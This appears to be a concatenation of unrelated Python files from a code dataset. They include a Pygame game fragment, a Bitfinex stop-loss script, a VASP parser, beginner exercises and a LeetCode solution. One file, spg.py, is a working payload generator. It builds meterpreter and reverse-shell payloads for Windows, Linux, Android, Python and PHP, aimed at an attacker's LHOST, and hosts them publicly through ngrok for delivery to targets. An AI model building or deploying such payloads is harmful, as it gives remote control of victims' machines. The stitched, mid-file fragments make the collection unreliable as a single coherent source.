    if junk_collect == lvl3_LIMIT: # level 3
        level = 3
    if level == -1: # instructions screen
        BACKGROUND_IMG = "background_level1"
    if score >= 0 and level >= 1:
        if level_screen == 1: # level 1 title screen
            BACKGROUND_IMG = "background_level1"
            if keyboard.RETURN == 1:
                level_screen = 2
        if level_screen == 2: # level 1 gameplay
            updatePlayer() # calling our player update function
            updateJunk() # calling junk update function
        if level == 2 and level_screen <= 3: # level 2 title
            BACKGROUND_IMG = "background_level2"
            level_screen = 3
            if keyboard.RETURN == 1:
                level_screen = 4
        if level_screen == 4: # level 2 gameplay
            updatePlayer()
            updateJunk()
            updateSatellite()
        if level == 3 and level_screen <= 5: # level 3 title
            level_screen = 5
            BACKGROUND_IMG = "background_level3"
            if keyboard.RETURN == 1:
                level_screen = 6
        if level_screen == 6: # level 3 game play
            updatePlayer()
            updateJunk()
            updateSatellite()
            updateDebris()
            updateLasers()
    if score < 0 or level == -2: # game over or end game
        # ENTER resets all progress and rebuilds the sprites via init()
        if keyboard.RETURN == 1:
            BACKGROUND_IMG = "background_logo"
            score = 0
            junk_collect = 0
            level = 0
            init()
def draw():
    """Pygame Zero frame hook: render background, sprites and HUD text
    according to the current level / level_screen state."""
    screen.clear()
    screen.blit(BACKGROUND_IMG, (0,0))
    if level == -1:
        start_button.draw()
        show_instructions = "Use UP and DOWN arrow keys to move your player\n\npress SPACEBAR to shoot"
        screen.draw.text(show_instructions, midtop=(WIDTH/2, 70), fontsize=35, color="white")
    if level == 0:
        start_button.draw()
        instructions_button.draw()
    if level >= 1:
        player.draw() # draw player sprite on screen
        for junk in junks:
            junk.draw() # draw junk sprite on screen
    if level >= 2:
        satellite.draw()
    if level == 3:
        debris.draw()
        for laser in lasers:
            laser.draw()
    # game over screen
    if score < 0:
        game_over = "GAME OVER\npress ENTER to play again"
        screen.draw.text(game_over, center=(WIDTH / 2, HEIGHT / 2), fontsize=60, color="white")
    #draw some text on the screen
    show_score = "Score: " + str(score) # remember to convert score to a string
    screen.draw.text(show_score, topleft=(650, 15), fontsize=35, color="white")
    show_collect_value = "Junk: " + str(junk_collect)
    screen.draw.text(show_collect_value, topleft=(450, 15), fontsize=35, color="white")
    if level >= 1:
        show_level = "LEVEL " + str(level)
        screen.draw.text(show_level, topright=(375, 15), fontsize=35, color="white")
    # odd level_screen values are the level title cards
    if level_screen == 1 or level_screen == 3 or level_screen == 5:
        show_level_title = "LEVEL " + str(level) + "\nPress ENTER to continue..."
        screen.draw.text(show_level_title, center=(WIDTH/2, HEIGHT/2), fontsize=70, color="white")
# make separate functions for each of our sprites
def updatePlayer():
    """Move the player from arrow-key input, clamp to the screen, and
    spawn a laser when SPACE is held on level 3."""
    # vertical movement: up takes priority over down, 5 px per frame
    if keyboard.up == 1:
        player.y -= 5
    elif keyboard.down == 1:
        player.y += 5

    # keep the sprite fully inside the window
    if player.top < 0:
        player.top = 0
    if player.bottom > HEIGHT:
        player.bottom = HEIGHT

    # lasers only exist on level 3; spawn one at the player's nose and let
    # fireLasers() (template code) apply the fire-rate cooldown
    if keyboard.space == 1 and level == 3:
        shot = Actor(LASER_IMG)
        shot.midright = player.midleft
        fireLasers(shot)
def updateJunk():
    """Scroll every junk sprite rightwards; respawn it off the left edge when
    it exits the screen or is collected, and award points on collection."""
    global score, junk_collect
    for junk in junks:
        junk.x += JUNK_SPEED
        collision = player.colliderect(junk)
        if junk.left > WIDTH or collision == 1:
            x_pos = random.randint(-500, -50)
            y_pos = random.randint(SCOREBOX_HEIGHT, HEIGHT - junk.height)
            # NOTE(review): respawn sets `topleft`, but init() positions junk
            # via `topright` — looks inconsistent; confirm which anchor is
            # intended.
            junk.topleft = (x_pos, y_pos)
        # collisions between player and junk
        if collision:
            score += 1 # update the score
            junk_collect += 1
def updateSatellite():
    """Scroll the satellite hazard; respawn it off-screen when it exits or
    touches the player, penalizing the score on a touch."""
    global score

    satellite.x += SATELLITE_SPEED
    hit_player = player.colliderect(satellite)

    if satellite.left > WIDTH or hit_player == 1:
        # respawn somewhere off the left edge, below the score box
        new_x = random.randint(-500, -50)
        new_y = random.randint(SCOREBOX_HEIGHT, HEIGHT - satellite.height)
        satellite.topright = (new_x, new_y)

    if hit_player == 1:
        score -= 10  # touching a satellite costs points
def updateDebris():
    """Scroll the debris hazard; respawn it off-screen on exit or player
    touch, penalizing the score on a touch."""
    global score

    debris.x += DEBRIS_SPEED
    hit_player = player.colliderect(debris)

    if debris.left > WIDTH or hit_player == 1:
        # respawn somewhere off the left edge, below the score box
        new_x = random.randint(-500, -50)
        new_y = random.randint(SCOREBOX_HEIGHT, HEIGHT - debris.height)
        debris.topright = (new_x, new_y)

    if hit_player == 1:
        score -= 10  # touching debris costs points
def updateLasers():
    """Advance every laser; despawn off-screen shots and resolve hits.

    Hitting the satellite costs 5 points; hitting the debris earns 5.
    Bug fixes vs. the original: iterate over a copy of `lasers` (the
    original removed items from the list it was iterating, which skips
    elements), and `continue` after each removal (the original could try to
    remove the same laser twice in one frame, raising ValueError).
    """
    global score
    for laser in lasers[:]:
        laser.x += LASER_SPEED  # LASER_SPEED is negative: lasers fly left

        # despawn once fully off the left edge
        if laser.right < 0:
            lasers.remove(laser)
            continue

        if satellite.colliderect(laser) == 1:
            lasers.remove(laser)
            x_sat = random.randint(-500, -50)
            y_sat = random.randint(SCOREBOX_HEIGHT, HEIGHT - satellite.height)
            satellite.topright = (x_sat, y_sat)
            score += - 5  # shooting the satellite is penalized
            continue

        if debris.colliderect(laser) == 1:
            lasers.remove(laser)
            x_deb = random.randint(-500, -50)
            y_deb = random.randint(SCOREBOX_HEIGHT, HEIGHT - debris.height)
            debris.topright = (x_deb, y_deb)
            score += 5  # shooting debris is rewarded
# activating lasers (template code)____________________________________
# laserActive implements a fire-rate cooldown: 1 = ready to shoot, 0 = cooling down.
player.laserActive = 1 # add laserActive status to the player
def makeLaserActive(): # when called, this function will make lasers active again
    # scheduled by fireLasers() via clock.schedule to end the cooldown
    global player
    player.laserActive = 1
def fireLasers(laser):
    """Fire `laser` if the cooldown allows it: rate-limits shots to one
    every 0.2 s, plays the sound effect and registers the laser sprite."""
    if player.laserActive == 1: # active status is used to prevent continuous shoot when holding space key
        player.laserActive = 0
        clock.schedule(makeLaserActive, 0.2) # schedule an event (function, time afterwhich event will occur)
        sounds.laserfire02.play() # play sound effect
        lasers.append(laser) # add laser to lasers list
pgzrun.go()
| true |
fa23a3c47e4f8134123a8175f234dd2239bfc60b | Python | saeeds255/bfx-python | /SellOrderSL.py | UTF-8 | 1,031 | 3 | 3 | [] | no_license |
from Bitfinex import Bitfinex
import json
import time
import sys
BFX = Bitfinex('API_KEY', 'API_SECRET', 'https://api.bitfinex.com/v1')
def startit():
    """Poll the market until the hard-coded stop price is reached, then close
    the first open Bitfinex position with a market order and exit.

    NOTE(review): assumptions to confirm —
    * `BFX.positions()[0]` raises IndexError when no position is open;
    * the stop price (2365.5) is hard-coded rather than derived from the
      position; and the script busy-polls the ticker every 2 seconds;
    * it places a market BUY, so it presumably closes a short position.
    """
    slprice = 2365.5
    myorder = BFX.positions()
    possymbol = str(myorder[0]['symbol'])
    posamount = float(myorder[0]['amount'])
    print("Position symbol: " + possymbol + " /Position amount: " + str(posamount) + " \n")
    price = BFX.get_ticker(possymbol)
    marketprice = float(price['last_price'])
    # block here until the last traded price reaches the stop price
    while (marketprice < slprice):
        time.sleep(2)
        price = BFX.get_ticker(possymbol)
        marketprice = float(price['last_price'])
    # always true once the loop above exits; kept as a guard
    if (marketprice >= slprice):
        myorder = BFX.buy(possymbol,posamount,marketprice,"market")
        print("Order ID: " + str(myorder['order_id']) + " / Direction: " + str(myorder['side']) + " / Price: " + str(myorder['price']) + " / Order amount: " + str(myorder['original_amount']) + " \n")
        sys.exit()
startit()
| true |
1ed7225e54643574a34a9d2d6e00174166532ac5 | Python | Benyamin-creator/simple-payload-generator | /spg.py | UTF-8 | 11,761 | 2.671875 | 3 | [
"BSD-3-Clause"
] | permissive | #!/usr/bin/python
#-*- coding: utf-8 -*-
################################################################################
# #
# SPG #
# Simple Payload Generator #
# by: Assassin umz #
# #
# Follow me : #
# •YouTube: https://youtube.com/c/pixiters #
# •Discord: https://discord.gg/3nfQadt #
# •Website: http://pixiters.ga #
# •GitHub: https://github.com/Assassinumz #
# #
# LICENSE #
# THIS SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. YOU MAY USE #
# THIS SOFTWARE AT YOUR OWN RISK. The use of this software Simple Payload #
# Generator(SPG) is COMPLETE RESPONSIBILITY of the END-USER. Developers assume #
# NO liability and are NOT responsible for any misuse or damage caused by #
# this program. #
# #
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY #
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES #
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; #
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND #
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT #
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF #
# THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE #
# #
################################################################################
import os, platform, wget
from SimpleHTTPServer import test
from sys import exit
from time import sleep
red= '\033[91m'
orange= '\33[38;5;208m'
green= '\033[92m'
cyan= '\033[36m'
bold= '\033[1m'
end= '\033[0m'
def head():
    # Clear the terminal and print the banner (Python 2 print statement; the
    # .format call fills in the ANSI colour codes defined at module scope).
    os.system('clear')
    print'''{0}
     █████████  ████████    ████████
    ███     ███ ██     ███ ███    
    ███         ██     ███ ███     
     █████████  ████████  ███   ████
            ███ ███        ███    ██
    ███     ███ ███        ███    ██
     █████████  ███         █████████
          |====(Simple Payload Generator)====|{3}
{2}Follow me :{3}
 {1}•{3} GitHub : {4}https://github.com/Assassinumz{3}
 {1}•{3} YouTube: {4}https://youtube.com/c/pixiters{3}
 {1}•{3} Discord: {4}https://discord.gg/3nfQadt{3}
 {1}•{3} Website: {4}http://pixiters.ga{3}
'''.format(orange, green, bold, end, cyan)
def disclaimer():
    # Ask the user to accept the terms; anything other than the exact string
    # 'yes' exits the program.  (Python 2 only: `print (expr).format(...)`
    # parses as printing the formatted expression, and raw_input reads stdin.)
    print('This tool was developed for learning purposes only and the use is complete responsibility of the end-user. Do you accept to cause no harm to any machine and use this tool for educational purposes only ? {0}(yes/no){1}').format(bold, end)
    if raw_input("\n{0}{1}SPG:~#{2} ".format(green, bold, end)) == 'yes':
        print('{0}Proceeding...{1}').format(green, end)
        sleep(1)
    else:
        print('{0}You must accept the terms and conditions to use this tool.{1}').format(red, end)
        exit(0)
def finish():
    # Show the banner, print a goodbye message and terminate the program.
    head()
    print('{0}Until next time...{1}').format(green, end)
    exit(0)
def present():
    """Check prerequisites on first run: msfvenom must exist; create the
    output directory and download the matching ngrok build if missing."""
    if not os.path.isfile('/usr/bin/msfvenom'):
        print('{0}Failed to locate msfvenom. Make sure Metasploit-Framework is installed correctly and try again.{1}').format(red, end)
        exit(0)
    if not os.path.isdir('output'):
        head()
        print('{0}Creating output directory{1}').format(green, end)
        os.makedirs('output')
        sleep(1)
    if not os.path.isfile('ngrok'):
        head()
        print("{0}Downloading Ngrok...{1}").format(green, end)
        # Bug fix: platform.architecture is a function; comparing the function
        # object itself to "32bit" was always False, so the 64-bit build was
        # downloaded even on 32-bit hosts.  Call it and check the first tuple
        # element ('32bit'/'64bit').
        if platform.architecture()[0] == "32bit":
            wget.download('https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-386.tgz')
            os.system('tar -xf ngrok-stable-linux-386.tgz')
            os.system('rm ngrok-stable-linux-386.tgz')
        else:
            wget.download('https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.tgz')
            os.system('tar -xf ngrok-stable-linux-amd64.tgz')
            os.system('rm ngrok-stable-linux-amd64.tgz')
def server():
    # Serve the ./output directory over HTTP on port 80 using Python 2's
    # SimpleHTTPServer; os.system blocks until the server process exits.
    os.system('cd output/ && python -m SimpleHTTPServer 80')
def ngrok():
    """Start an ngrok HTTP tunnel plus a local web server for ./output,
    display the public URL, and tear both down when the user hits Return
    (or presses Ctrl-C).

    NOTE(review): the fixed 5-second sleeps assume ngrok and its local
    status API come up in time — a race on slow hosts; confirm acceptable.
    """
    head()
    try:
        # launch ngrok in the background, then scrape its local status page
        # for the public tunnel URL
        os.system('./ngrok http 80 > /dev/null &')
        sleep(5)
        os.system('curl -s -N http://127.0.0.1:4040/status | grep "http://[0-9a-z]*\.ngrok.io" -oh > ngrok.url')
        sleep(5)
        url = open('ngrok.url', 'r')
        print('\nNgrok Url:{0} ' + url.read() + '{1}').format(cyan, end)
        # serve the generated payloads in the background
        os.system('cd output/ && python -m SimpleHTTPServer 80 &')
        sleep(5)
        raw_input('Hit {0}(Return){1} to stop the server and return back to Main Menu'.format(bold, end))
        os.system('pkill -f "python -m SimpleHTTPServer 80"')
        os.system('pkill -f ngrok')
        url.close()
        choosepayload()
    except KeyboardInterrupt:
        # make sure both background processes are killed on Ctrl-C too
        os.system('pkill -f "python -m SimpleHTTPServer 80"')
        os.system('pkill -f ngrok')
        finish()
def main(platform, type):
    """Prompt for LHOST/LPORT/output name, map (platform, type) to an
    msfvenom payload/format/extension triple, generate the payload into
    ./output and offer to start the ngrok server.

    NOTE(review): the parameters shadow the builtins `platform` and `type`
    (and the local `format` shadows that builtin too); an unrecognized
    (platform, type) combination leaves `payload` unbound and raises
    NameError at the os.system call.  The msfvenom command is built by
    concatenating raw user input — only safe for a trusted local operator.
    """
    lhost = raw_input("\nEnter your LHOST\n{0}{1}SPG:~/LHOST#{2} ".format(green, bold, end))
    lport = raw_input("\nEnter your LPORT\n{0}{1}SPG:~/LPORT#{2} ".format(green, bold, end))
    output = raw_input("\nEnter the name of output file\n{0}{1}SPG:~/output#{2} ".format(green, bold, end))
    #Windows
    if platform == 'Windows' and type == '1':
        payload= 'windows/meterpreter/reverse_http'
        format= 'exe'
        extension= '.exe'
    if platform == 'Windows' and type == '2':
        payload= 'windows/meterpreter/reverse_https'
        format= 'exe'
        extension= '.exe'
    if platform == 'Windows' and type == '3':
        payload= 'windows/meterpreter/reverse_tcp'
        format= 'exe'
        extension= '.exe'
    #linux
    if platform == 'Linux' and type == '1':
        payload= 'linux/x86/shell/reverse_tcp'
        format= 'elf'
        extension= '.elf'
    if platform == 'Linux' and type == '2':
        payload= 'linux/x86/meterpreter/reverse_tcp'
        format= 'elf'
        extension= '.elf'
    #Android
    elif platform == 'Android' and type == '1':
        payload= 'android/meterpreter/reverse_http'
        format= 'raw'
        extension= '.apk'
    elif platform == 'Android' and type == '2':
        payload= 'android/meterpreter/reverse_https'
        format= 'raw'
        extension= '.apk'
    elif platform == 'Android' and type == '3':
        payload= 'android/meterpreter/reverse_tcp'
        format= 'raw'
        extension= '.apk'
    #Python
    elif platform == 'Python' and type == '1':
        payload= 'python/meterpreter/reverse_http'
        format= 'raw'
        extension= '.py'
    elif platform == 'Python' and type == '2':
        payload= 'python/meterpreter/reverse_https'
        format= 'raw'
        extension= '.py'
    elif platform == 'Python' and type == '3':
        payload= 'python/meterpreter/reverse_tcp'
        format= 'raw'
        extension= '.py'
    #PHP
    elif platform == 'PHP' and type == '1':
        payload= 'php/meterpreter/reverse_tcp'
        format= 'raw'
        extension= '.php'
    # generate the payload with msfvenom into the output/ directory
    os.system('msfvenom -p '+payload+' LHOST='+lhost+' LPORT='+lport+' -f'+format+' -o output/'+output+extension)
    sleep(3)
    if os.path.isfile('output/'+output+extension) == False:
        head()
        raw_input('{2}Failed to create payload, please try again.{1} {0}(Hit Enter to continue){1}'.format(bold, end, red))
        choosepayload()
    else:
        # inner helper: loop until the user answers y/n about starting ngrok
        def server_start():
            head()
            http_server = raw_input('Your payload has been sucessfully generated in the output directory. Do you want to start Ngrok server now ? {1}(y/n){2}\n{0}{1}SPG:~#{2} '.format(green, bold, end))
            if http_server == 'y' or http_server == 'Y':
                ngrok()
            elif http_server == 'n' or http_server == 'N':
                choosepayload()
            else:
                raw_input('Please Choose a Valid option {0}(Hit Return to continue){1}'.format(bold, end))
                server_start()
        server_start()
def choosepayload():
    # Top-level interactive menu: pick a platform, then a payload type, and
    # hand both to main().  `green`/`bold`/`end` are presumably ANSI colour
    # strings defined earlier in the script (not visible here).
    head()
    select = raw_input('{2}Choose a payload platform:{1}\n\n{0}[{1}1{0}]{1} Windows\n{0}[{1}2{0}]{1} Linux\n{0}[{1}3{0}]{1} Android\n{0}[{1}4{0}]{1} Python\n{0}[{1}5{0}]{1} PHP\n{0}[{1}6{0}]{1} Start Ngrok Server\n{0}[{1}0{0}]{1} Exit\n\n{0}{2}SPG:~#{1} '.format(green, end, bold))
    if select == '1':
        head()
        type = raw_input('{2}Choose a payload type:{1}\n\n{0}[{1}1{0}]{1} windows/meterpreter/reverse_http\n{0}[{1}2{0}]{1} windows/meterpreter/reverse_https\n{0}[{1}3{0}]{1} windows/meterpreter/reverse_tcp\n{0}[{1}0{0}]{1} Main Menu\n\n{0}{2}SPG:~/Windows#{1} '.format(green, end, bold))
        # NOTE(review): after the recursive choosepayload() call returns,
        # execution falls through and main() is still invoked with type '0'
        # -- confirm this fall-through is intended (same pattern below).
        if type == '0':
            choosepayload()
        main('Windows', type)
    elif select == '2':
        head()
        type = raw_input('{2}Choose a payload type:{1}\n\n{0}[{1}1{0}]{1} linux/x86/shell/reverse_tcp\n{0}[{1}2{0}]{1} linux/x86/meterpreter/reverse_tcp\n{0}[{1}0{0}]{1} Main Menu\n\n{0}{2}SPG:~/Linux#{1} '.format(green, end, bold))
        if type == '0':
            choosepayload()
        main('Linux', type)
    elif select == '3':
        head()
        type = raw_input('{2}Choose a payload type:{1}\n\n{0}[{1}1{0}]{1} android/meterpreter/reverse_http\n{0}[{1}2{0}]{1} android/meterpreter/reverse_https\n{0}[{1}3{0}]{1} android/meterpreter/reverse_tcp\n{0}[{1}0{0}]{1} Main Menu\n\n{0}{2}SPG:~/Android#{1} '.format(green, end, bold))
        if type == '0':
            choosepayload()
        main('Android', type)
    elif select == '4':
        head()
        type = raw_input('{2}Choose a payload type:{1}\n\n{0}[{1}1{0}]{1} python/meterpreter/reverse_http\n{0}[{1}2{0}]{1} python/meterpreter/reverse_https\n{0}[{1}3{0}]{1} python/meterpreter/reverse_tcp\n{0}[{1}0{0}]{1} Main Menu\n\n{0}{2}SPG:~/Python#{1} '.format(green, end, bold))
        if type == '0':
            choosepayload()
        main('Python', type)
    elif select == '5':
        head()
        type = raw_input('{2}Choose a payload type:{1}\n\n{0}[{1}1{0}]{1} php/meterprter/reverse_tcp\n{0}[{1}0{0}]{1} Main Menu\n\n{0}{2}SPG:~/PHP#{1} '.format(green, end, bold))
        if type == '0':
            choosepayload()
        main('PHP', type)
    elif select == '6':
        # Serve already-generated payloads without building a new one.
        ngrok()
    elif select == '0':
        finish()
    else:
        head()
        print('{0}Please choose a valid option.{1}').format(red, end)
        sleep(2)
        choosepayload()
if __name__ == "__main__":
try:
head()
disclaimer()
present()
choosepayload()
except KeyboardInterrupt:
finish()
| true |
fb1a75f9e7d590fd20bec1889ea127ce5c9b3292 | Python | tdengg/pylastic | /.local/lib/python2.7/site-packages/pylastic/get_DFTdata.py | UTF-8 | 2,335 | 2.90625 | 3 | [] | no_license | """Get data from DFT calculations.
"""
import lxml.etree as et
class VASP(object):
    """VASP interface for collecting energies from vasprun.xml."""

    def __init__(self):
        # Path to the output file (vasprun.xml or a PHONOPY free-energy file).
        self.__vfile = None
        # Number of atoms in the supercell (normalises DFPT energies).
        self.__cellsize = 1
        # Expected energy window used to filter bogus VASP output values.
        self.__ERange = (-3000., -1000.)

    ##
    def set_outfile(self, vfile):
        """Set and parse the VASP output file (vasprun.xml)."""
        self.__vfile = vfile
        self.__vasprun = et.parse(self.__vfile)

    def get_outfile(self):
        """Return the parsed vasprun.xml element tree."""
        return self.__vasprun

    ##
    def set_gsEnergy(self):
        """Get groundstate energy (last electronic step) from vasprun.xml."""
        elem = self.__vasprun.xpath("//scstep[last()]/energy/i[@name = 'e_fr_energy']")
        self.__gsEnergy = float(elem[0].text)

    #####################################
    def set_cellsize(self, cells):
        """Set supercell size.

        Parameters
        ----------
        cells : integer
            Number of atoms in the supercell.
        """
        self.__cellsize = cells

    def get_cellsize(self):
        return self.__cellsize

    def set_ERange(self, ERange):
        """Set expected energy range to filter VASP output.

        Parameters
        ----------
        ERange : tuple (emin, emax)
            Energy range.
        """
        self.__ERange = ERange

    def set_gsEnergy_DFPT(self):
        """Compensate for VASP's messy DFPT output.

        Collects every electronic-step energy, records unparsable entries
        as 0. (discarded by the window filter), keeps only values inside
        the expected energy window and stores the last one, normalised per
        atom of the supercell.
        """
        elem = self.__vasprun.xpath("//scstep/energy/i[@name = 'e_fr_energy']")
        allengys = []
        for k in elem:
            try:
                allengys.append(float(k.text))
            # Narrowed from a bare `except:` so real errors (e.g.
            # KeyboardInterrupt) are no longer swallowed silently.
            except (TypeError, ValueError):
                allengys.append(0.)
        trueengys = [engy for engy in allengys
                     if self.__ERange[0] < engy < self.__ERange[1]]
        self.__gsEnergy = trueengys[-1] / self.__cellsize

    ####################################
    def get_gsEnergy(self):
        return self.__gsEnergy

    ##
    def set_freeEnergy(self, T):
        """Process PHONOPY free energy output.

        Parameters
        ----------
        T : int
            Line index into the PHONOPY output file (temperature row).
        """
        # Context manager guarantees the file is closed even if parsing
        # fails (the original leaked the handle on error).  96.47244
        # converts kJ/mol to eV -- TODO confirm units against the
        # PHONOPY output format actually used here.
        with open(self.__vfile) as g:
            self.__freeEnergy = float(g.readlines()[T].split()[1]) / 96.47244

    def get_freeEnergy(self):
        return self.__freeEnergy
a00c206ec5552c48fc5fd01f5ce34f471f4f89ee | Python | db3124/bigdata_maestro | /Python/myPyCode/chap06/write1.py | UTF-8 | 518 | 3.546875 | 4 | [] | no_license | import os
# os: module providing operating-system related functionality.
# Get current working directory (return value is not stored; kept from the
# original lesson code).
os.getcwd()
# The except branch runs only if opening the user-supplied file fails.
try:
    fileName = input('파일명을 입력하세요: ')
    # BUG FIX: append mode so the write below is legal -- the original
    # 'rt' (read-only) mode made f.write() raise io.UnsupportedOperation
    # whenever the file existed.
    f = open(fileName, 'a')
except OSError:
    # Narrowed from a bare `except:`; fall back to a default file.
    f = open('myFile.txt', 'a')
# When writing a text file, always end a finished line with '\n'.
str1 = 'This is my third file.\n'
f.write(str1)
# Closing the file also invalidates the file object f.
f.close()
| true |
dc69614edac2e183377a10ba9cafa05ee3316049 | Python | Pduhard/mlp_42 | /protodeep/Protodeep/initializers/HeNormal.py | UTF-8 | 312 | 2.5625 | 3 | [] | no_license | import numpy as np
from Protodeep.initializers.Initializer import Initializer
class HeNormal(Initializer):
    """He normal initializer.

    Samples standard-normal values scaled by sqrt(2 / n_out), where n_out
    is the last entry of the requested shape.
    """

    def initialize(self, shape, dtype=None, *args, **kwargs):
        scale = np.sqrt(2 / shape[-1])
        return np.random.randn(*shape) * scale
| true |
09f9fe0dc39786f45638775ac23c38b84db59161 | Python | ivovtin/workMTD | /scripts/example/read_write_single_register.py | UTF-8 | 1,868 | 2.96875 | 3 | [] | no_license | #!/bin/env python
import random # For randint
import sys # For sys.argv and sys.exit
import uhal
if __name__ == '__main__':
# PART 1: Argument parsing
if len(sys.argv) != 4:
print "Incorrect usage!"
print "usage: read_write_single_register.py <path_to_connection_file> <connection_id> <register_name>"
sys.exit(1)
connectionFilePath = sys.argv[1];
deviceId = sys.argv[2];
registerName = sys.argv[3];
# PART 2: Creating the HwInterface
connectionMgr = uhal.ConnectionManager("file://" + connectionFilePath);
hw = connectionMgr.getDevice(deviceId);
node = hw.getNode(registerName)
#for x in range(100000):
for x in range(2):
print(x)
# PART 3: Reading from the register
print "Reading from register '" + registerName + "' ..."
reg = node.read();
# dispatch method sends read request to hardware, and waits for result to return
# N.B. Before dispatch, reg.valid() == false, and reg.value() will throw
hw.dispatch();
print "... success!"
print "Value =", hex(reg)
print "Value =", reg
# PART 4: Writing (random value) to the register
print "Writing random value to register '" + registerName + "' ..."
#node.write(random.randint(0, 0xffffffff));
node.write(10);
# N.B. Depending on how many transactions are already queued, this write request may either be sent to the board during the write method, or when the dispatch method is called
hw.dispatch();
# In case there are any problems with the transaction, an exception will be thrown from the dispatch method
# Alternatively, if you want to check whether an individual write succeeded or failed, you can call the 'valid()' method of the uhal::ValHeader object that is returned by the write method
print "... success!"
| true |
1c355979c4cc1542d15514ea780e3f101b928f46 | Python | tientheshy/leetcode-solutions | /src/221.maximal-square.py | UTF-8 | 945 | 3.25 | 3 | [] | no_license | #
# @lc app=leetcode id=221 lang=python3
#
# [221] Maximal Square
#
# @lc code=start
# TAGS: Array, Dynamic Programming
# REVIEWME: similar to 1277
class Solution:
    """LeetCode 221, Maximal Square.

    Dynamic programming in O(R*C): each cell stores the side length of the
    largest all-'1' square whose bottom-right corner is that cell.
    """

    def maximalSquare(self, matrix: List[List[str]]) -> int:
        """Return the area of the largest square of '1's in the grid."""
        if not matrix or not matrix[0]:
            return 0
        # Integer DP table seeded from the character grid.
        side = [[int(cell == '1') for cell in row] for row in matrix]
        best = 0
        for i, row in enumerate(side):
            for j, val in enumerate(row):
                # A cell extends a square only if its top, left and
                # top-left neighbours all do.
                if val and i and j:
                    row[j] = 1 + min(side[i - 1][j], row[j - 1], side[i - 1][j - 1])
                if row[j] > best:
                    best = row[j]
        return best * best
# @lc code=end
| true |
5425e1aaf8bc7d4e48785da568cb5cbd43e0e552 | Python | viva0330/APS | /IM_study/0415/5201.py | UTF-8 | 2,138 | 3.453125 | 3 | [] | no_license | """
화물이 실려있는 N개의 컨테이너를 M대의 트럭으로 A도시에서 B도시로 운반.
트럭당 한개의 컨테이너 운반. 적재용량 초과 컨테이너 운반 불가.
A->B 최대 M개의 트럭이 편도로 한 번 만 운행한다고 한다.
총 증량이 최대가 되도록 컨테이너를 옮겼다면 옮겨진 화물의 전체 무게가 얼마인지,,?
화물을 싣지 못한 트럭이나 남는화물이 있을 수 있다. 컨테이너를 하나도 옮길 수 없는 경우
0 을 출력한다.
"""
"""
1. 적재 용량이 큰 트럭순으로 배열
2. 무거운 컨테이너 순으로 배열
3. 최선의 방법을 찾ㅇ는다.
3-1, 현재 기준으로 가장 무거운 컨테이너를 적재용량 큰 것에 넣기.
3-2 현재 기준을 변경한다.
그리디 알고리즘은 항상 옳은지 검증 후 사용!
ex) 1800
800원 거슬러주려고 한다.
500, 100, 50, 100
3-1 최선의 방법:
500 => 1
300원 남음
300 => 100자리 3개,,?
4개
만약에 동전이 400원짜리 동전이 있었다고 치자...!
이 경우에는 400원짜리 2개가 제일 적기 때문 ㅇㅇ,,!
"""
T = int(input())
for tc in range(1, T+1):
    # N: number of containers, M: number of trucks
    N, M = map(int, input().split())
    Mlist = list(map(int, input().split())) # container weights
    Nlist = list(map(int, input().split())) # truck capacities
    # Greedy: match heaviest loads with largest trucks, both sorted descending.
    Mlist.sort(reverse=True)
    Nlist.sort(reverse=True)
    # Which side to use as the iteration reference.
    # The professor iterated over the trucks (try it container-first separately!)
    # Keep a running index so already-considered items are skipped.
    idx = 0
    total = 0
    for w in Mlist:
        # Resume scanning from the previous position.
        # NOTE(review): bounds use N although Nlist was read with M values,
        # and `idx < N-1` skips the last candidate (off-by-one?) -- also
        # `total` is accumulated but never printed.  Verify against the
        # intended SWEA 5201 solution.
        while idx < N and Nlist[idx] > w:
            idx += 1
        if idx < N-1:
            total += Nlist[idx]
            idx += 1
        """
        while idx < N:
            if Nlist[idx] > w:
                idx += 1
            else:
                # 싣었다는 소리 위로 올라가는 작업!
                total += Nlist[idx]
                idx += 1
        """
| true |
9339637c0b6a04d28162faf78740fb5d6a1c2f23 | Python | NaomiBis/Python-week-3 | /bankstatement.py | UTF-8 | 1,356 | 4.09375 | 4 | [] | no_license | #A employee bank statement
#ask for user details
name=input("please enter name \n")
surname=input("please enter surname\n")
#ask for account number
acc_number= int(input("please enter account number \n"))
#ask for salary
salary=int(input("Enter your salary (R) \n"))
#variables to hold the tax, pension and new salary
# NOTE(review): these module-level variables are never actually updated --
# each function below assigns a *local* of the same name and returns it.
tax_salary=0
new_salary=0
pension_savings=0
#tax calculation function
def tax():
    """Return 10% of the global salary as the taxed amount."""
    tax_salary=((10/100)*(salary))
    return tax_salary
#pension calculation function
def pension():
    """Return 15% of the global salary as the pension contribution."""
    pension_savings=((15/100)*(salary))
    return pension_savings
#new salary calculation function
def new_amount():
    """Return the take-home amount: salary minus tax and pension."""
    new_salary=salary-tax()-pension()
    return new_salary
#display all details
print("*********Python Bank Statement**********")
print("#######################################")
print ("Name: \t \t \t",name)
print("Surname: \t \t",surname)
print("Account Number: \t",acc_number)
print("Account type:"+" \t \t Savings")
print("--------------------------------------------")
print("Your current salary: \t (R)", salary)
print("Your taxed amount: \t (R)", tax())
print("Your pension amount: \t (R)", pension())
print("-----------------------------------------")
print("Your current available amount: \t (R)",new_amount())
print("---------------THANK YOU------------------")
| true |
9dcc9c96cdfc9759e41ca965648743dfbfe11276 | Python | ccena/Learning-Basic-Python | /Chapter 2 Introduction to Numpy/2.8.3 More Advanced Compound Types.py | UTF-8 | 692 | 4.21875 | 4 | [] | no_license | # -*- coding: utf-8 -*-
"""
It is possible to define even more advanced compound types. For example,
you can create a type where each element contains an array or matrix of values.
"""
import numpy as np
# Here, we’ll create a data type with a mat component consisting of a
# 3×3 floating-point matrix:
